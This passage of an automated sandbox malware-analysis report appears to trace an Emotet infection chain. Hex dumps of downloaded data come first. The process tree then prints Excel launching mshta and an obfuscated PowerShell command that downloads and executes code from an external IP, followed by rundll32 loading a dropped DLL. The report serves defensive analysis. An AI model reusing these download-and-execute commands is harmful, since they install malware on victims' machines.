                                                                                                                        2022-01-28 19:52:28 UTC320INData Raw: 00 00 00 ff ff ff ff 15 4a 04 10 00 00 00 00 1d 4a 04 10 22 05 93 19 02 00 00 00 10 fe 04 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 40 4a 04 10 22 05 93 19 01 00 00 00 44 fe 04 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 63 4a 04 10 22 05 93 19 01 00 00 00 70 fe 04 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 86 4a 04 10 22 05 93 19 01 00 00 00 9c fe 04 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff a9 4a 04 10 22 05 93 19 01 00 00 00 c8 fe 04 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 54 32 05 10 90 ff ff ff 9f 85 02 10 00 00 00 00 54 32 05 10
                                                                                                                        Data Ascii: JJ"@J"DcJ"pJ"J"T2T2
                                                                                                                        2022-01-28 19:52:28 UTC336INData Raw: 50 61 72 73 65 44 69 73 70 6c 61 79 4e 61 6d 65 40 40 00 8c 9b 04 10 00 00 00 00 2e 3f 41 56 58 4f 6c 65 49 50 46 72 61 6d 65 40 43 4f 6c 65 43 6f 6e 74 72 6f 6c 43 6f 6e 74 61 69 6e 65 72 40 40 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 55 49 4f 6c 65 49 6e 50 6c 61 63 65 46 72 61 6d 65 40 40 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 55 49 4f 6c 65 49 6e 50 6c 61 63 65 55 49 57 69 6e 64 6f 77 40 40 00 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 56 43 44 61 74 61 53 6f 75 72 63 65 43 6f 6e 74 72 6f 6c 40 40 00 00 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 55 49 4e 6f 74 69 66 79 44 42 45 76 65 6e 74 73 40 40 00 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 56 58 4f 6c 65 43 6c 69 65 6e 74 53 69 74 65 40 43 4f 6c 65 43 6f 6e 74 72 6f 6c 53 69 74 65 40 40 00 00 00 00 8c 9b 04 10
                                                                                                                        Data Ascii: ParseDisplayName@@.?AVXOleIPFrame@COleControlContainer@@.?AUIOleInPlaceFrame@@.?AUIOleInPlaceUIWindow@@.?AVCDataSourceControl@@.?AUINotifyDBEvents@@.?AVXOleClientSite@COleControlSite@@
                                                                                                                        2022-01-28 19:52:28 UTC352INData Raw: 20 80 30 22 d7 5f 20 12 26 4a 67 58 11 16 b6 dc b6 23 9d 92 00 5a 89 00 9d 78 b5 ba 0c 68 8a 20 14 47 93 53 8c 0d f8 19 b2 14 cb d9 c5 31 55 2c 4f 1c 81 8f d0 3a 9c c6 e5 f5 c7 a8 1c 7e e2 e0 90 cd 24 3f 28 e9 fc 74 f2 f2 6c 53 da ef 54 0b a6 93 60 77 f9 0e c0 3e 06 ba da 53 68 d6 c3 81 fb 17 71 96 d1 39 7b 0b 7d 1d ef 8c d8 67 30 d2 04 30 34 43 6a 90 9f fe 6d 79 17 0d 60 2f d4 e1 be 81 20 37 a6 49 ce 89 e7 e9 a1 97 ba 88 9e cb 35 bd c2 47 12 43 70 43 8e bf be 18 79 14 b7 cb 8d 39 2a 34 4b 98 20 df b8 38 75 7b 07 a8 66 9a 54 0b fa 74 3f 31 8e 22 30 03 3e e2 55 d5 c9 ab 21 c7 e3 65 bd 25 a3 54 f5 39 35 b4 45 9c 6a ad 92 86 7e b1 fd a0 06 c5 e3 54 f5 18 a6 32 79 8f 86 77 ef a0 53 60 9d 5e 2d 3e c2 ba 65 5e 5e f6 6a 7d 6a 4e 64 ca c3 1e 46 a6 3a a9 a1 52 c0
                                                                                                                        Data Ascii: 0"_ &JgX#Zxh GS1U,O:~$?(tlST`w>Shq9{}g004Cjmy`/ 7I5GCpCy9*4K 8u{fTt?1"0>U!e%T95Ej~T2ywS`^->e^^j}jNdF:R
                                                                                                                        2022-01-28 19:52:28 UTC368INData Raw: 35 5f 03 c0 94 e8 a7 41 95 79 e0 7d aa 34 bf 83 47 b7 ac 04 c6 b4 ad 21 0e 59 1a 69 14 1f b2 32 6d be 96 08 90 3b 9b 0d 04 59 a3 bd c4 74 20 d1 a5 46 7f 11 60 a6 a1 31 28 89 62 21 aa e9 78 39 ba 3d ae ce f7 bb 88 56 0b 95 b7 c6 85 27 55 aa b8 e7 43 4e 2e 04 0d 0a 2c 0d dd 42 17 41 1e c2 30 c2 a2 07 2c 1b 44 43 c8 7b ce 66 aa 6a e6 a7 ff c4 d6 99 90 e8 10 1d 4b 0a fd f8 bd ad 84 bf 49 4c 6a d4 b3 a7 e4 ca ef b0 73 a5 f3 6a d8 34 82 83 a7 b7 8e 7a 5e 11 ce dc 3e 5c f1 8a 63 5e 7b c5 16 77 d4 b0 cf 93 d5 fa 84 f4 f2 9b 36 5d 5c 65 ca 6e f5 e6 0c ad 0c f5 bc 73 f1 46 13 a5 ae dc 8e 45 48 2b 5a 56 b9 6e 7c dc 2f 29 a6 a1 1a 01 21 18 d4 6d 6f 59 6c 85 4b 69 00 3b 37 00 1c 0b b6 1d 8f 64 c9 36 e2 f8 e5 d8 6b 55 6a 38 81 ee 4e 46 c1 03 b3 f4 51 43 5f 0c 52 c0 be
                                                                                                                        Data Ascii: 5_Ay}4G!Yi2m;Yt F`1(b!x9=V'UCN.,BA0,DC{fjKILjsj4z^>\c^{w6]\ensFEH+ZVn|/)!moYlKi;7d6kUj8NFQC_R
                                                                                                                        2022-01-28 19:52:28 UTC384INData Raw: d6 6d c4 b5 dd 35 75 07 41 15 64 6f 6d c8 91 45 80 ef 67 e1 f3 41 ca 29 84 e8 e4 07 d6 2e 0e 22 5c e7 94 0f 8b 03 57 4a 44 d8 b3 94 9b 1d 50 9a 67 cb d6 61 bf a2 6b 6a d3 7a ce 24 9b 7f 9a eb 42 f8 24 dc e2 32 0d 39 8c 63 43 6d 51 0f be 31 8a f2 d8 a4 8a 0d a1 02 8d f8 9b 39 1f 33 bd 1f de 7e f3 a6 de 73 26 fa ff 46 be 5e 4c 11 ad 22 87 6f 34 c9 3f 44 b9 a0 a9 73 5e a5 1a 84 84 4e 85 a3 da 9a 72 03 ed 50 87 76 38 28 aa 39 ae fa 8a 05 be b6 70 82 d0 99 b3 52 eb 56 20 bb b9 bd f9 23 46 32 00 a1 87 9c 7e 79 64 46 21 06 40 0f aa ac 21 75 46 bd 93 11 df d1 c0 a6 66 a2 6e dd 26 dd df 1e 22 7f cc 61 19 bb 4e 18 b9 a6 47 f6 99 d2 54 86 ab 2d da 6f 1c ca 2f 3b 3e 45 25 bb 11 ba dd 0c 99 e3 0f 02 f3 1d 05 a1 e8 c9 0a 18 5d 69 c8 6a 2e 0a 92 d7 ee b8 6b 64 6e 48 a0
                                                                                                                        Data Ascii: m5uAdomEgA)."\WJDPgakjz$B$29cCmQ193~s&F^L"o4?Ds^NrPv8(9pRV #F2~ydF!@!uFfn&"aNGT-o/;>E%]ij.kdnH
                                                                                                                        2022-01-28 19:52:28 UTC400INData Raw: 29 a0 d6 0b 33 d2 fb 3c e7 b0 02 2b 5d cf 11 df d4 89 01 28 a1 9c ca f5 3b 30 21 48 05 06 33 cf ea b8 95 3a b9 1d bb b3 3f 94 5c ae 12 1d 2b 44 c3 c2 93 25 76 db b3 41 9b 3e 65 79 d3 b4 b9 69 eb 0b 48 2b 83 3d f9 00 32 4b ae 9a c2 47 a7 a5 fc 8d 81 a9 07 bc 81 c9 54 61 e2 ce c7 f5 61 8f b7 42 00 06 c0 f1 b4 31 7d 03 2a 78 f4 d2 00 bf 3f e2 27 5b 18 42 f2 21 5f 23 f8 0c 27 3a be 7d 4b 16 a6 9d 23 7c 11 51 9f 87 10 df b5 23 5e 6a a8 40 b6 4b 3a e2 3c a6 be 32 ca fc 40 d5 ef cf 40 88 77 e0 5e ea 8f ff 3d 5d 60 cc aa 64 e3 b8 54 47 b8 e7 d9 2b 73 63 12 7a ba 78 ca 5d e7 69 ac fa a0 72 06 96 80 bd 92 68 8d d5 3c 53 09 d1 07 63 82 51 41 e5 88 84 43 48 12 c8 e7 7c 5e f2 93 b6 18 dc bb 8f 15 93 9d 8b b9 96 5f 77 8b b2 fb a2 6a 4b 28 4c 94 cb e5 54 1d 32 3e 1d 28
                                                                                                                        Data Ascii: )3<+](;0!H3:?\+D%vA>eyiH+=2KGTaaB1}*x?'[B!_#':}K#|Q#^j@K:<2@@w^=]`dTG+sczx]irh<ScQACH|^_wjK(LT2>(
                                                                                                                        2022-01-28 19:52:28 UTC416INData Raw: b7 79 aa b6 1f 95 b9 4e 21 08 09 6f f5 11 c0 35 e1 aa 61 49 01 61 67 a8 71 e1 a7 24 5b 2f 2f ad 3c e6 1f c9 a2 7a be 79 04 13 b4 5c 6c b2 1e ff bb 50 45 54 bb 7f 2e 70 ca 2d 43 c7 83 1a 47 b2 fa cf 00 c2 89 88 eb 76 88 b8 31 fc 0d 10 fd b4 df 2b fa 63 76 ca 13 9d 49 9c 46 1d bb 84 64 de b1 ae 6b 2b 7d d6 2a b0 c3 40 af 31 0b e0 76 61 44 b3 62 23 8a 27 e0 d1 1e 8f c3 51 ba c6 89 f3 22 ce 91 05 94 f7 29 1e a9 ca da 63 21 2d f7 88 5d fe 64 0f 21 73 49 2f b1 68 e4 cc c9 67 96 70 9f 3d e6 e0 8a b3 6d 9a 01 c5 37 a1 3b c0 46 09 6b ec 2a 94 3e 29 a3 11 01 8d 49 46 c5 ce 9b 5a 1e d5 00 1a aa 16 b6 f7 80 59 13 df d3 92 82 bb f2 f6 65 6d 85 0c 0a ed 7a 5b 80 8f 98 72 4e 0a 22 59 e5 f0 5b 80 fc fb e0 1a 19 fa eb 39 32 19 38 47 eb 91 ea fa d7 e5 5e db d4 20 5b 58 7d
                                                                                                                        Data Ascii: yN!o5aIagq$[//<zy\lPET.p-CGv1+cvIFdk+}*@1vaDb#'Q")c!-]d!sI/hgp=m7;Fk*>)IFZYemz[rN"Y[928G^ [X}
                                                                                                                        2022-01-28 19:52:28 UTC432INData Raw: 5a 21 27 44 d1 be 3d f0 1c 3c c0 9a 3a c6 fd 1d 6f 09 ca cb 00 35 e6 5d 62 b8 90 ea cc f9 9b 84 be bd 1f a9 88 cc 37 72 8d a2 42 e0 c9 44 c8 56 96 d5 63 1a 4c 8e dd 76 3f 6b 79 52 81 fb ca b1 d2 0d e1 f1 3c 85 ce 46 df d5 01 c8 6a c9 f6 14 ef ce 7b f6 1b 7d 15 16 45 1d a6 f4 be 48 8f 18 40 ad 23 0f c5 8e 2d 65 e3 a6 d5 33 a7 09 e1 32 38 ae c1 f4 a0 08 f4 7f b3 22 a1 0a 93 31 ab 51 94 5a 2c 94 dd 1c 9c b7 ce 29 a3 fa c9 d9 76 09 d4 98 96 f7 d6 51 2c 27 cf 5d 17 8e 34 b8 f9 48 f2 5a a8 45 83 43 c6 d7 10 33 1a c9 e4 db e8 e4 bf 3c e0 9c 22 da 48 e0 0b ec cb 9b 91 df 7e 00 89 d9 b9 b4 f2 78 27 a2 05 be 9a 57 cf 7f f3 41 66 2c 13 c0 69 83 16 29 06 98 b6 ea 0c 0a 01 2b 0e 67 df 89 e2 65 c0 8f e3 ad c4 f9 97 af 03 da f4 60 b1 0f 1b 24 29 4d 2b ec cd 80 5f c0 e9
                                                                                                                        Data Ascii: Z!'D=<:o5]b7rBDVcLv?kyR<Fj{}EH@#-e328"1QZ,)vQ,']4HZEC3<"H~x'WAf,i)+ge`$)M+_
                                                                                                                        2022-01-28 19:52:28 UTC448INData Raw: 69 d4 2c 2b 88 1d bd c1 b5 8f 0a cb a8 29 2e 80 30 86 5e 71 b0 8d 53 5f ec 08 87 27 59 a0 38 4d b4 ef 18 0c c7 a3 77 ea 56 52 b3 57 ec 92 7a db 1c 47 15 fb 3e 6f 82 94 25 3e bb b5 31 3c 5f 38 ff 57 0d 0d c9 07 52 10 19 d8 39 51 d2 1d 7f e0 65 b7 e0 a6 98 c8 3d 36 9c f5 d6 a4 3e 0d 8c c4 46 b6 d0 82 60 ec 8b 35 ac a7 18 88 a9 b5 38 12 51 44 07 d4 bb b3 f8 94 d3 ff 7b 54 ac b3 4f 6d 5f 65 64 21 d8 73 47 0e 5c 42 e8 cf e3 6f 1d 1b 67 3c 54 24 44 18 25 52 54 b3 34 19 31 3b 3c 9c 2c 84 93 db 41 4d 3b e0 4f 0a 07 71 c6 a1 a1 03 13 f9 08 41 71 30 2d 74 cb 83 f4 41 7c 81 60 fd e9 e0 7d 25 f1 89 13 8b 6c 3c c6 3e 04 4f e6 05 2e e3 ab 1f 09 00 61 f9 de 06 9f a4 aa 39 f9 1f 4d 1b 77 c9 ab ae d5 25 68 f1 47 b5 e8 7f 7d ae 98 b0 26 37 c6 e0 84 d2 39 11 e0 eb 5c f1 3d
                                                                                                                        Data Ascii: i,+).0^qS_'Y8MwVRWzG>o%>1<_8WR9Qe=6>F`58QD{TOm_ed!sG\Bog<T$D%RT41;<,AM;OqAq0-tA|`}%l<>O.a9Mw%hG}&79\=
                                                                                                                        2022-01-28 19:52:28 UTC464INData Raw: 1b 68 8d a8 6b f7 53 81 0f 29 c7 c9 c2 d6 ac cc 12 43 7f 30 d0 91 62 dc ca 54 3b 58 fb 23 9a eb 7c e6 7c e7 25 a2 78 bf 1d ea 00 5a 78 60 20 af 2d 68 19 72 c2 63 42 9b e9 58 32 5a 8e 5a 43 38 a1 48 6f 8d 26 88 82 0c af 68 01 8a 6b 2a 2d ac 9e f6 b1 05 af f4 57 0e 14 d4 a9 8e 9b 85 95 a8 5c ea 40 1f 23 eb 74 3d 75 74 3a 59 7a 5c 3f 17 6e 2d f9 77 ef 47 6b 50 a2 e8 05 1c f7 31 d0 08 5f 3e eb 56 44 d4 40 31 7f 99 14 9d 2c 7f b0 1d ff 01 f2 44 6e 14 e2 e8 f2 0b 85 b1 ef 01 80 2c 56 96 66 6b b5 3b f9 97 92 e5 73 15 a5 c2 f8 a5 a0 26 4d 7c 6c a8 4a 0a 5c 2d 9d 79 07 ea a0 42 fb 63 d4 e9 9f 47 1f c8 26 7b 40 eb ee 33 c8 5f 5f 4b 4b e8 49 94 39 82 47 8d bb e6 e7 e0 65 02 5b 53 7c 66 34 ff ca 43 59 3c 78 b7 27 19 b1 2f f0 2c ef b9 8d a0 23 82 9d a4 85 7d 22 52 17
                                                                                                                        Data Ascii: hkS)C0bT;X#||%xZx` -hrcBX2ZZC8Ho&hk*-W\@#t=ut:Yz\?n-wGkP1_>VD@1,Dn,Vfk;s&M|lJ\-yBcG&{@3__KKI9Ge[S|f4CY<x'/,#}"R
                                                                                                                        2022-01-28 19:52:28 UTC480INData Raw: 45 10 88 ba 62 bb 89 65 d1 ae 15 89 04 df b7 b4 45 e7 7f 82 07 67 85 58 54 f8 e7 6b 13 10 a6 8f 29 5b 49 f0 5f c3 da ab 00 38 1e e3 01 05 e3 72 f3 ee 3f 01 fe 9c 77 a0 d8 ba ec b9 42 14 99 1d 5c a6 ce ec 79 f4 1d 21 d4 11 e0 96 36 4e 1c fa 7b 72 51 e2 93 02 00 80 8f b4 52 39 1d 46 b1 85 29 90 6b 12 ef f9 0b b6 1c 17 fe fa fe b2 0b ce 13 a6 cd 17 21 dd 35 93 21 01 22 cf 20 cd f9 71 cb a8 17 01 c1 29 de 5a 10 92 d7 b5 31 a9 38 a8 84 6f 30 59 07 bd 5a 99 a4 b2 e1 55 d9 80 83 0a 2d ec e9 c9 23 62 5a ca d7 1a ed fa e1 14 c9 40 6c 65 30 15 e1 c6 ae 50 d1 24 ac d9 4c 55 5e 5b 15 23 34 a1 3d 71 e6 dd 67 5a 7f 58 78 83 ff c9 6b d3 29 de 58 71 1b 53 1a a6 2a ec 82 b5 b0 85 50 f4 f8 43 b8 45 f0 ac 63 ef f8 62 7f 97 2d 5b 35 e8 17 fa c2 7f 53 7e 36 a2 7e c3 6b 6a 73
                                                                                                                        Data Ascii: EbeEgXTk)[I_8r?wB\y!6N{rQR9F)k!5!" q)Z18o0YZU-#bZ@le0P$LU^[#4=qgZXxk)XqS*PCEcb-[5S~6~kjs
                                                                                                                        2022-01-28 19:52:28 UTC496INData Raw: 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44
                                                                                                                        Data Ascii: INGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
                                                                                                                        2022-01-28 19:52:28 UTC512INData Raw: 3a a0 3a a4 3a a8 3a ac 3a b0 3a b4 3a b8 3a bc 3a c0 3a c4 3a c8 3a cc 3a d0 3a d4 3a d8 3a dc 3a e0 3a e4 3a e8 3a ec 3a f0 3a f4 3a f8 3a fc 3a 00 3b 04 3b 08 3b 0c 3b 10 3b 14 3b 18 3b 1c 3b 20 3b 24 3b 28 3b 2c 3b 30 3b 34 3b 38 3b 3c 3b 40 3b 44 3b 48 3b 4c 3b 50 3b 54 3b 88 3b 8c 3b e8 3b ec 3b f0 3b f4 3b f8 3b fc 3b 00 3c 70 3c 74 3c 00 a0 04 00 d0 00 00 00 d0 39 d4 39 d8 39 dc 39 e0 39 e4 39 e8 39 ec 39 f0 39 f4 39 f8 39 fc 39 00 3a 04 3a 08 3a 0c 3a 10 3a 14 3a 18 3a 1c 3a 20 3a 24 3a 28 3a 2c 3a 30 3a 34 3a 38 3a 3c 3a 40 3a 44 3a 48 3a 4c 3a 50 3a 54 3a 58 3a 5c 3a 60 3a 64 3a 68 3a 6c 3a 70 3a 74 3a 78 3a 7c 3a 80 3a 84 3a 88 3a 8c 3a 90 3a 94 3a 98 3a 9c 3a a0 3a a4 3a a8 3a ac 3a b0 3a b4 3a b8 3a bc 3a c0 3a c4 3a c8 3a cc 3a d0 3a d4 3a
                                                                                                                        Data Ascii: :::::::::::::::::::::::::;;;;;;;; ;$;(;,;0;4;8;<;@;D;H;L;P;T;;;;;;;;;<p<t<999999999999:::::::: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:::::::::::::::::::::::
                                                                                                                        2022-01-28 19:52:28 UTC528INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:


                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Target ID:0
                                                                                                                        Start time:20:52:17
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                        Imagebase:0x13f720000
                                                                                                                        File size:28253536 bytes
                                                                                                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:2
                                                                                                                        Start time:20:52:19
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html
                                                                                                                        Imagebase:0x4a1a0000
                                                                                                                        File size:345088 bytes
                                                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:4
                                                                                                                        Start time:20:52:20
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:mshta http://91.240.118.168/zzx/ccv/fe.html
                                                                                                                        Imagebase:0x13f820000
                                                                                                                        File size:13824 bytes
                                                                                                                        MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:6
                                                                                                                        Start time:20:52:23
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                        Imagebase:0x13f280000
                                                                                                                        File size:473600 bytes
                                                                                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:8
                                                                                                                        Start time:20:52:32
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                                                                                                                        Imagebase:0x4a980000
                                                                                                                        File size:345088 bytes
                                                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:9
                                                                                                                        Start time:20:52:33
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                                                                                                                        Imagebase:0xd60000
                                                                                                                        File size:44544 bytes
                                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.447160166.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:10
                                                                                                                        Start time:20:52:36
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                                                                                                                        Imagebase:0xd60000
                                                                                                                        File size:44544 bytes
                                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494317741.0000000002F11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493631688.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493871437.0000000000BF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493984139.0000000002370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494455991.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494009099.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494267369.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493959169.0000000002341000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494193723.00000000025F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494121481.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494079905.00000000024F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493846362.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
